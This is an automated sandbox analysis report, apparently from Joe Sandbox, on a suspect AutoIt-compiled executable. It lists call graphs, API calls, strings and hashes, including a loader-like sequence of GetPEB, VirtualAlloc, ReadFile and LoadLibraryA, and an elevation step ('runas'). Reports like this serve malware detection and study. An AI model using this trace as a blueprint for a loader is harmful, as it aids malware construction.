101079 102b1e3 GetProcAddress 101077->101079 101079->101077 101082 102b1f9 ExitProcess 101079->101082 101081 102b264 101080->101081 101081->101081 101083 18e29bb 101084 18e29c2 101083->101084 101085 18e29ca 101084->101085 101086 18e2a60 101084->101086 101090 18e2670 101085->101090 101103 18e3310 9 API calls 101086->101103 101089 18e2a47 101104 18e0000 101090->101104 101093 18e2740 CreateFileW 101094 18e270f 101093->101094 101096 18e274d 101093->101096 101095 18e2769 VirtualAlloc 101094->101095 101094->101096 101101 18e2870 FindCloseChangeNotification 101094->101101 101102 18e2880 VirtualFree 101094->101102 101107 18e3580 GetPEB 101094->101107 101095->101096 101097 18e278a ReadFile 101095->101097 101098 18e295c VirtualFree 101096->101098 101099 18e296a 101096->101099 101097->101096 101100 18e27a8 VirtualAlloc 101097->101100 101098->101099 101099->101089 101100->101094 101100->101096 101101->101094 101102->101094 101103->101089 101109 18e3520 GetPEB 101104->101109 101106 18e068b 101106->101094 101108 18e35aa 101107->101108 101108->101093 101110 18e354a 101109->101110 101110->101106 101111 f3ff06 101112 f3ff10 101111->101112 101148 f0ac90 Mailbox _memmove 101111->101148 101211 f08e34 59 API calls Mailbox 101112->101211 101118 f0b5d5 101123 f081a7 59 API calls 101118->101123 101119 f20ff6 59 API calls Mailbox 101136 f0a097 Mailbox 101119->101136 101121 f081a7 59 API calls 101121->101136 101131 f0a1b7 101123->101131 101124 f4047f 101215 f6a0b5 89 API calls 4 library calls 101124->101215 101125 f0b5da 101221 f6a0b5 89 API calls 4 library calls 101125->101221 101126 f07f41 59 API calls 101126->101148 101129 f077c7 59 API calls 101129->101136 101130 f4048e 101132 f22f80 67 API calls __cinit 101132->101136 101133 f57405 59 API calls 101133->101136 101135 f566f4 Mailbox 59 API calls 101135->101131 101136->101118 101136->101119 101136->101121 101136->101124 101136->101125 101136->101129 101136->101131 101136->101132 101136->101133 101137 f40e00 101136->101137 101140 f0a6ba 101136->101140 101205 f0ca20 340 API calls 2 library calls 101136->101205 101206 f0ba60 60 API calls Mailbox 101136->101206 101220 f6a0b5 89 API calls 4 library calls 101137->101220 101139 f7bf80 340 API calls 101139->101148 101219 f6a0b5 89 API calls 4 library calls 101140->101219 101141 f566f4 Mailbox 59 API calls 101141->101148 101142 f0b416 101210 f0f803 340 API calls 101142->101210 101144 f0a000 340 API calls 101144->101148 101145 f40c94 101217 f09df0 59 API calls Mailbox 101145->101217 101147 f40ca2 101218 f6a0b5 89 API calls 4 library calls 101147->101218 101148->101126 101148->101131 101148->101136 101148->101139 101148->101141 101148->101142 101148->101144 101148->101145 101148->101147 101151 f0b37c 101148->101151 101152 f20ff6 59 API calls Mailbox 101148->101152 101157 f0b685 101148->101157 101160 f0ade2 Mailbox 101148->101160 101167 f7c5f4 101148->101167 101199 f67be0 101148->101199 101212 f57405 59 API calls 101148->101212 101213 f7c4a7 85 API calls 2 library calls 101148->101213 101150 f40c86 101150->101131 101150->101135 101208 f09e9c 60 API calls Mailbox 101151->101208 101152->101148 101154 f0b38d 101209 f09e9c 60 API calls Mailbox 101154->101209 101216 f6a0b5 89 API calls 4 library calls 101157->101216 101160->101131 101160->101150 101160->101157 101161 f400e0 VariantClear 101160->101161 101162 f7e237 130 API calls 101160->101162 101163 f6d2e6 101 API calls 101160->101163 101164 f12123 95 API calls 101160->101164 101165 f05906 60 API calls 101160->101165 101166 f7474d 340 API calls 101160->101166 101207 f09df0 59 API calls Mailbox 101160->101207 101214 f57405 59 API calls 101160->101214 101161->101160 101162->101160 101163->101160 101164->101160 101165->101160 101166->101160 101168 f077c7 59 API calls 101167->101168 101169 f7c608 101168->101169 101170 f077c7 59 API calls 101169->101170 101171 f7c610 101170->101171 101172 f077c7 59 API calls 101171->101172 101173 f7c618 101172->101173 101174 f09997 84 API calls 101173->101174 101176 f7c626 101174->101176 101175 f7c83c Mailbox 101175->101148 101176->101175 101177 f07d2c 59 API calls 101176->101177 101178 f7c80f 101176->101178 101180 f7c7f6 101176->101180 101182 f7c811 101176->101182 101184 f07a84 59 API calls 101176->101184 101186 f081a7 59 API calls 101176->101186 101187 f07faf 59 API calls 101176->101187 101192 f07faf 59 API calls 101176->101192 101196 f09997 84 API calls 101176->101196 101197 f07c8e 59 API calls 101176->101197 101198 f07e0b 59 API calls 101176->101198 101177->101176 101178->101175 101235 f09b9c 59 API calls Mailbox 101178->101235 101181 f07e0b 59 API calls 101180->101181 101183 f7c803 101181->101183 101185 f07e0b 59 API calls 101182->101185 101188 f07c8e 59 API calls 101183->101188 101184->101176 101189 f7c820 101185->101189 101186->101176 101190 f7c6bd CharUpperBuffW 101187->101190 101188->101178 101191 f07c8e 59 API calls 101189->101191 101222 f0859a 68 API calls 101190->101222 101191->101178 101193 f7c77d CharUpperBuffW 101192->101193 101223 f0c707 101193->101223 101196->101176 101197->101176 101198->101176 101200 f67bec 101199->101200 101201 f20ff6 Mailbox 59 API calls 101200->101201 101202 f67bfa 101201->101202 101203 f67c08 101202->101203 101204 f077c7 59 API calls 101202->101204 101203->101148 101204->101203 101205->101136 101206->101136 101207->101160 101208->101154 101209->101142 101210->101157 101211->101148 101212->101148 101213->101148 101214->101160 101215->101130 101216->101150 101217->101150 101218->101150 101219->101131 101220->101125 101221->101131 101222->101176 101224 f07b76 59 API calls 101223->101224 101225 f0c72c _wcscmp 101223->101225 101224->101225 101226 f07f41 59 API calls 101225->101226 101228 f0c760 Mailbox 101225->101228 101227 f41abb 101226->101227 101229 f07c8e 59 API calls 101227->101229 101228->101176 101230 f41ac6 101229->101230 101236 f0859a 68 API calls 101230->101236 101232 f41ad7 101233 f41adb Mailbox 101232->101233 101237 f09e9c 60 API calls Mailbox 101232->101237 101233->101176 101235->101175 101236->101232 101237->101233 101238 f01066 101243 f0f8cf 101238->101243 101240 f0106c 101241 f22f80 __cinit 67 API calls 101240->101241 101242 f01076 101241->101242 101244 f0f8f0 101243->101244 101276 f20143 101244->101276 101248 f0f937 101249 f077c7 59 API calls 101248->101249 101250 f0f941 101249->101250 101251 f077c7 59 API calls 101250->101251 101252 f0f94b 101251->101252 101253 f077c7 59 API calls 101252->101253 101254 f0f955 101253->101254 101255 f077c7 59 API calls 101254->101255 101256 f0f993 101255->101256 101257 f077c7 59 API calls 101256->101257 101258 f0fa5e 101257->101258 101286 f160e7 101258->101286 101262 f0fa90 101263 f077c7 59 API calls 101262->101263 101264 f0fa9a 101263->101264 101314 f1ffde 101264->101314 101266 f0fae1 101267 f0faf1 GetStdHandle 101266->101267 101268 f449d5 101267->101268 101269 f0fb3d 101267->101269 101268->101269 101271 f449de 101268->101271 101270 f0fb45 OleInitialize 101269->101270 101270->101240 101321 f66dda 64 API calls Mailbox 101271->101321 101273 f449e5 101322 f674a9 CreateThread 101273->101322 101275 f449f1 CloseHandle 101275->101270 101323 f2021c 101276->101323 101279 f2021c 59 API calls 101280 f20185 101279->101280 101281 f077c7 59 API calls 101280->101281 101282 f20191 101281->101282 101283 f07d2c 59 API calls 101282->101283 101284 f0f8f6 101283->101284 101285 f203a2 6 API calls 101284->101285 101285->101248 101287 f077c7 59 API calls 101286->101287 101288 f160f7 101287->101288 101289 f077c7 59 API calls 101288->101289 101290 f160ff 101289->101290 101330 f15bfd 101290->101330 101293 f15bfd 59 API calls 101294 f1610f 101293->101294 101295 f077c7 59 API calls 101294->101295 101296 f1611a 101295->101296 101297 f20ff6 Mailbox 59 API calls 101296->101297 101298 f0fa68 101297->101298 101299 f16259 101298->101299 101300 f16267 101299->101300 101301 f077c7 59 API calls 101300->101301 101302 f16272 101301->101302 101303 f077c7 59 API calls 101302->101303 101304 f1627d 101303->101304 101305 f077c7 59 API calls 101304->101305 101306 f16288 101305->101306 101307 f077c7 59 API calls 101306->101307 101308 f16293 101307->101308 101309 f15bfd 59 API calls 101308->101309 101310 f1629e 101309->101310 101311 f20ff6 Mailbox 59 API calls 101310->101311 101312 f162a5 RegisterClipboardFormatW 101311->101312 101312->101262 101315 f55cc3 101314->101315 101316 f1ffee 101314->101316 101333 f69d71 60 API calls 101315->101333 101317 f20ff6 Mailbox 59 API calls 101316->101317 101320 f1fff6 101317->101320 101319 f55cce 101320->101266 101321->101273 101322->101275 101334 f6748f 65 API calls 101322->101334 101324 f077c7 59 API calls 101323->101324 101325 f20227 101324->101325 101326 f077c7 59 API calls 101325->101326 101327 f2022f 101326->101327 101328 f077c7 59 API calls 101327->101328 101329 f2017b 101328->101329 101329->101279 101331 f077c7 59 API calls 101330->101331 101332 f15c05 101331->101332 101332->101293 101333->101319 101335 f0568a 101336 f05c18 59 API calls 101335->101336 101337 f0569c 101336->101337 101338 f05632 61 API calls 101337->101338 101339 f056aa 101338->101339 101341 f056ba Mailbox 101339->101341 101342 f081c1 61 API calls Mailbox 101339->101342 101342->101341 101343 f4220e GetTempPathW 101344 f4222b 101343->101344 101345 f0e70b 101348 f0d260 101345->101348 101347 f0e719 101349 f0d27d 101348->101349 101367 f0d4dd 101348->101367 101350 f42b0a 101349->101350 101351 f42abb 101349->101351 101355 f0d2a4 101349->101355 101392 f7a6fb 340 API calls __cinit 101350->101392 101353 f42abe 101351->101353 101362 f42ad9 101351->101362 101353->101355 101356 f42aca 101353->101356 101357 f22f80 __cinit 67 API calls 101355->101357 101361 f0d6ab 101355->101361 101363 f0d594 101355->101363 101355->101367 101368 f42c26 101355->101368 101372 f08620 69 API calls 101355->101372 101379 f0a000 340 API calls 101355->101379 101380 f081a7 59 API calls 101355->101380 101382 f088a0 68 API calls __cinit 101355->101382 101383 f086a2 68 API calls 101355->101383 101385 f0859a 68 API calls 101355->101385 101386 f0d0dc 340 API calls 101355->101386 101387 f09f3a 59 API calls Mailbox 101355->101387 101388 f0d060 89 API calls 101355->101388 101389 f0cedd 340 API calls 101355->101389 101393 f08bb2 68 API calls 101355->101393 101394 f09e9c 60 API calls Mailbox 101355->101394 101395 f56d03 60 API calls 101355->101395 101390 f7ad0f 340 API calls 101356->101390 101357->101355 101360 f42cdf 101360->101360 101361->101347 101362->101367 101391 f7b1b7 340 API calls 3 library calls 101362->101391 101384 f08bb2 68 API calls 101363->101384 101367->101361 101397 f6a0b5 89 API calls 4 library calls 101367->101397 101396 f7aa66 89 API calls 101368->101396 101369 f0d5a3 101369->101347 101372->101355 101379->101355 101380->101355 101382->101355 101383->101355 101384->101369 101385->101355 101386->101355 101387->101355 101388->101355 101389->101355 101390->101361 101391->101367 101392->101355 101393->101355 101394->101355 101395->101355 101396->101367 101397->101360 101398 18e2410 101399 18e0000 GetPEB 101398->101399 101400 18e24ef 101399->101400 101412 18e2300 101400->101412 101413 18e2309 Sleep 101412->101413 101414 18e2317 101413->101414 101415 f0b56e 101422 f1fb84 101415->101422 101417 f0b584 101418 f0c707 69 API calls 101417->101418 101419 f0b5ac 101418->101419 101421 f0a4e8 101419->101421 101431 f6a0b5 89 API calls 4 library calls 101419->101431 101423 f1fb90 101422->101423 101424 f1fba2 101422->101424 101432 f09e9c 60 API calls Mailbox 101423->101432 101426 f1fbd1 101424->101426 101427 f1fba8 101424->101427 101433 f09e9c 60 API calls Mailbox 101426->101433 101428 f20ff6 Mailbox 59 API calls 101427->101428 101430 f1fb9a 101428->101430 101430->101417 101431->101421 101432->101430 101433->101430

                                    Executed Functions

                                    Function 00F03B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F03B7A
                                    • IsDebuggerPresent.KERNEL32 ref: 00F03B8C
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FC62F8,00FC62E0,?,?), ref: 00F03BFD
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                      • Part of subcall function 00F10A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F03C26,00FC62F8,?,?,?), ref: 00F10ACE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F03C81
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00FB93F0,00000010), ref: 00F3D4BC
                                    • SetCurrentDirectoryW.KERNEL32(?,00FC62F8,?,?,?), ref: 00F3D4F4
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FB5D40,00FC62F8,?,?,?), ref: 00F3D57A
                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F3D581
                                      • Part of subcall function 00F03A58: GetSysColorBrush.USER32(0000000F), ref: 00F03A62
                                      • Part of subcall function 00F03A58: LoadCursorW.USER32(00000000,00007F00), ref: 00F03A71
                                      • Part of subcall function 00F03A58: LoadIconW.USER32(00000063), ref: 00F03A88
                                      • Part of subcall function 00F03A58: LoadIconW.USER32(000000A4), ref: 00F03A9A
                                      • Part of subcall function 00F03A58: LoadIconW.USER32(000000A2), ref: 00F03AAC
                                      • Part of subcall function 00F03A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F03AD2
                                      • Part of subcall function 00F03A58: RegisterClassExW.USER32(?), ref: 00F03B28
                                      • Part of subcall function 00F039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F03A15
                                      • Part of subcall function 00F039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03A36
                                      • Part of subcall function 00F039E7: ShowWindow.USER32(00000000,?,?), ref: 00F03A4A
                                      • Part of subcall function 00F039E7: ShowWindow.USER32(00000000,?,?), ref: 00F03A53
                                      • Part of subcall function 00F043DB: _memset.LIBCMT ref: 00F04401
                                      • Part of subcall function 00F043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F044A6
                                    Strings
                                    • runas, xrefs: 00F3D575
                                    • This is a third-party compiled AutoIt script., xrefs: 00F3D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 529118366-3287110873
                                    • Opcode ID: b6592e247230646b1bd727e140de90329c0ff43e3b23acf14240258db441104a
                                    • Instruction ID: 9019eccf804abeda5cfac721feccd697cbd1dbbbf76a6643eb408c6751cada14
                                    • Opcode Fuzzy Hash: b6592e247230646b1bd727e140de90329c0ff43e3b23acf14240258db441104a
                                    • Instruction Fuzzy Hash: 0A51D371D0824DAEDF11EBB4DD06EED7BB9AF05710B0480A9F411E31E2DA78A645FB21
                                    Function 00F03633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 765 f03633-f03681 767 f036e1-f036e3 765->767 768 f03683-f03686 765->768 767->768 769 f036e5 767->769 770 f036e7 768->770 771 f03688-f0368f 768->771 772 f036ca-f036d2 NtdllDefWindowProc_W 769->772 773 f036ed-f036f0 770->773 774 f3d31c-f3d34a call f111d0 call f111f3 770->774 775 f03695-f0369a 771->775 776 f0375d-f03765 PostQuitMessage 771->776 777 f036d8-f036de 772->777 779 f036f2-f036f3 773->779 780 f03715-f0373c SetTimer RegisterClipboardFormatW 773->780 809 f3d34f-f3d356 774->809 781 f036a0-f036a2 775->781 782 f3d38f-f3d3a3 call f62a16 775->782 778 f03711-f03713 776->778 778->777 785 f036f9-f0370c KillTimer call f044cb call f03114 779->785 786 f3d2bf-f3d2c2 779->786 780->778 787 f0373e-f03749 CreatePopupMenu 780->787 788 f03767-f03776 call f04531 781->788 789 f036a8-f036ad 781->789 782->778 801 f3d3a9 782->801 785->778 794 f3d2c4-f3d2c6 786->794 795 f3d2f8-f3d317 MoveWindow 786->795 787->778 788->778 797 f036b3-f036b8 789->797 798 f3d374-f3d37b 789->798 804 f3d2e7-f3d2f3 SetFocus 794->804 805 f3d2c8-f3d2cb 794->805 795->778 799 f0374b-f0375b call f045df 797->799 800 f036be-f036c4 797->800 798->772 807 f3d381-f3d38a call f5817e 798->807 799->778 800->772 800->809 801->772 804->778 805->800 810 f3d2d1-f3d2e2 call f111d0 805->810 807->772 809->772 814 f3d35c-f3d36f call f044cb call f043db 809->814 810->778 814->772
                                    APIs
                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00F036D2
                                    • KillTimer.USER32(?,00000001), ref: 00F036FC
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F0371F
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F0372A
                                    • CreatePopupMenu.USER32 ref: 00F0373E
                                    • PostQuitMessage.USER32(00000000), ref: 00F0375F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                    • String ID: TaskbarCreated
                                    • API String ID: 157504867-2362178303
                                    • Opcode ID: 392e17469a6220292edcc7008b1543cb2d177683399715acd99c897a8b709e2c
                                    • Instruction ID: 87b507c42a62b3cc171544673e8fc86e32becb653fca93b837c6d823eebf8238
                                    • Opcode Fuzzy Hash: 392e17469a6220292edcc7008b1543cb2d177683399715acd99c897a8b709e2c
                                    • Instruction Fuzzy Hash: 2F4129B260810DBBDF145F68ED0AFBD375DEB04310F540129FA02D72E2CA66AD54B761
                                    Function 00F04AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1002 f04afe-f04b5e call f077c7 GetVersionExW call f07d2c 1007 f04b64 1002->1007 1008 f04c69-f04c6b 1002->1008 1010 f04b67-f04b6c 1007->1010 1009 f3db90-f3db9c 1008->1009 1011 f3db9d-f3dba1 1009->1011 1012 f04c70-f04c71 1010->1012 1013 f04b72 1010->1013 1015 f3dba3 1011->1015 1016 f3dba4-f3dbb0 1011->1016 1014 f04b73-f04baa call f07e8c call f07886 1012->1014 1013->1014 1024 f04bb0-f04bb1 1014->1024 1025 f3dc8d-f3dc90 1014->1025 1015->1016 1016->1011 1018 f3dbb2-f3dbb7 1016->1018 1018->1010 1020 f3dbbd-f3dbc4 1018->1020 1020->1009 1022 f3dbc6 1020->1022 1026 f3dbcb-f3dbce 1022->1026 1024->1026 1027 f04bb7-f04bc2 1024->1027 1028 f3dc92 1025->1028 1029 f3dca9-f3dcad 1025->1029 1030 f04bf1-f04c08 GetCurrentProcess IsWow64Process 1026->1030 1031 f3dbd4-f3dbf2 1026->1031 1032 f3dc13-f3dc19 1027->1032 1033 f04bc8-f04bca 1027->1033 1034 f3dc95 1028->1034 1036 f3dc98-f3dca1 1029->1036 1037 f3dcaf-f3dcb8 1029->1037 1038 f04c0a 1030->1038 1039 f04c0d-f04c1e 1030->1039 1031->1030 1035 f3dbf8-f3dbfe 1031->1035 1044 f3dc23-f3dc29 1032->1044 1045 f3dc1b-f3dc1e 1032->1045 1040 f04bd0-f04bd3 1033->1040 1041 f3dc2e-f3dc3a 1033->1041 1034->1036 1042 f3dc00-f3dc03 1035->1042 1043 f3dc08-f3dc0e 1035->1043 1036->1029 1037->1034 1046 f3dcba-f3dcbd 1037->1046 1038->1039 1047 f04c20-f04c30 call f04c95 1039->1047 1048 f04c89-f04c93 GetSystemInfo 1039->1048 1049 f3dc5a-f3dc5d 1040->1049 1050 f04bd9-f04be8 1040->1050 1052 f3dc44-f3dc4a 1041->1052 1053 f3dc3c-f3dc3f 1041->1053 1042->1030 1043->1030 1044->1030 1045->1030 1046->1036 1059 f04c32-f04c3f call f04c95 1047->1059 1060 f04c7d-f04c87 GetSystemInfo 1047->1060 1051 f04c56-f04c66 1048->1051 1049->1030 1058 f3dc63-f3dc78 1049->1058 1055 f3dc4f-f3dc55 1050->1055 1056 f04bee 1050->1056 1052->1030 1053->1030 1055->1030 1056->1030 1061 f3dc82-f3dc88 1058->1061 1062 f3dc7a-f3dc7d 1058->1062 1067 f04c41-f04c45 GetNativeSystemInfo 1059->1067 1068 f04c76-f04c7b 1059->1068 1063 f04c47-f04c4b 1060->1063 1061->1030 1062->1030 1063->1051 1065 f04c4d-f04c50 FreeLibrary 1063->1065 1065->1051 1067->1063 1068->1067
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 00F04B2B
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    • GetCurrentProcess.KERNEL32(?,00F8FAEC,00000000,00000000,?), ref: 00F04BF8
                                    • IsWow64Process.KERNEL32(00000000), ref: 00F04BFF
                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F04C45
                                    • FreeLibrary.KERNEL32(00000000), ref: 00F04C50
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00F04C81
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00F04C8D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                    • String ID:
                                    • API String ID: 1986165174-0
                                    • Opcode ID: d7011bcdbe0b51e4aa99cf09b3df9611b841d0d748f87d413e9268a65e87ecd0
                                    • Instruction ID: 9fa43fc52d6de5cadf229e689a02149055cf4e69a53f52b972b0fe5c0c9d6892
                                    • Opcode Fuzzy Hash: d7011bcdbe0b51e4aa99cf09b3df9611b841d0d748f87d413e9268a65e87ecd0
                                    • Instruction Fuzzy Hash: B991E4B194ABC4DEC731DB6894512AAFFE4AF65310F44499DD1CB83A81D234F908F729
                                    Function 00F04FE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1129 f04fe9-f04ff7 1130 f04fff-f05001 1129->1130 1131 f05021-f05026 1130->1131 1132 f05003-f0501a FindResourceExW 1130->1132 1133 f05020 1132->1133 1134 f3dd5c-f3dd6b LoadResource 1132->1134 1133->1131 1134->1133 1135 f3dd71-f3dd7f SizeofResource 1134->1135 1135->1133 1136 f3dd85-f3dd90 LockResource 1135->1136 1136->1133 1137 f3dd96-f3ddb4 1136->1137 1137->1133
                                    APIs
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F04EEE,?,?,00000000,00000000), ref: 00F05010
                                    • LoadResource.KERNEL32(?,00000000,?,?,00F04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F04F8F), ref: 00F3DD60
                                    • SizeofResource.KERNEL32(?,00000000,?,?,00F04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F04F8F), ref: 00F3DD75
                                    • LockResource.KERNEL32(00F04EEE,?,?,00F04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F04F8F,00000000), ref: 00F3DD88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SCRIPT
                                    • API String ID: 3473537107-3967369404
                                    • Opcode ID: 96ff7ded7698efe9699d6394acf8cddddc4c8324af50b6314eec4fa70e6110c8
                                    • Instruction ID: 34d3252e68eb8f9f4841ca18fb8e740fc37ccd9ef861169c86b1dd9e6383150a
                                    • Opcode Fuzzy Hash: 96ff7ded7698efe9699d6394acf8cddddc4c8324af50b6314eec4fa70e6110c8
                                    • Instruction Fuzzy Hash: 9D115A75600705AFD7218B65DC58FAB7BB9EBC9B21F204168F406C62A0DBA1E804AA60
                                    Function 0102B090 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1140 102b090-102b09d 1141 102b0aa-102b0af 1140->1141 1142 102b0b1 1141->1142 1143 102b0b3 1142->1143 1144 102b0a0-102b0a5 1142->1144 1146 102b0b8-102b0ba 1143->1146 1145 102b0a6-102b0a8 1144->1145 1145->1141 1145->1142 1147 102b0c3-102b0c7 1146->1147 1148 102b0bc-102b0c1 1146->1148 1149 102b0d4-102b0d7 1147->1149 1150 102b0c9 1147->1150 1148->1147 1153 102b0e0-102b0e2 1149->1153 1154 102b0d9-102b0de 1149->1154 1151 102b0f3-102b0f8 1150->1151 1152 102b0cb-102b0d2 1150->1152 1155 102b0fa-102b103 1151->1155 1156 102b10b-102b10d 1151->1156 1152->1149 1152->1151 1153->1146 1154->1153 1157 102b105-102b109 1155->1157 1158 102b17a-102b17d 1155->1158 1159 102b116 1156->1159 1160 102b10f-102b114 1156->1160 1157->1159 1161 102b182-102b185 1158->1161 1162 102b0e4-102b0e6 1159->1162 1163 102b118-102b11b 1159->1163 1160->1159 1166 102b187-102b189 1161->1166 1164 102b0e8-102b0ed 1162->1164 1165 102b0ef-102b0f1 1162->1165 1167 102b124 1163->1167 1168 102b11d-102b122 1163->1168 1164->1165 1169 102b145-102b154 1165->1169 1166->1161 1170 102b18b-102b18e 1166->1170 1167->1162 1171 102b126-102b128 1167->1171 1168->1167 1172 102b156-102b15d 1169->1172 1173 102b164-102b171 1169->1173 1170->1161 1174 102b190-102b1ac 1170->1174 1175 102b131-102b135 1171->1175 1176 102b12a-102b12f 1171->1176 1172->1172 1178 102b15f 1172->1178 1173->1173 1179 102b173-102b175 1173->1179 1174->1166 1180 102b1ae 1174->1180 1175->1171 1177 102b137 1175->1177 1176->1175 1181 102b142 1177->1181 1182 102b139-102b140 1177->1182 1178->1145 1179->1145 1183 102b1b4-102b1b8 1180->1183 1181->1169 1182->1171 1182->1181 1184 102b1ba-102b1d0 LoadLibraryA 1183->1184 1185 102b1ff-102b202 1183->1185 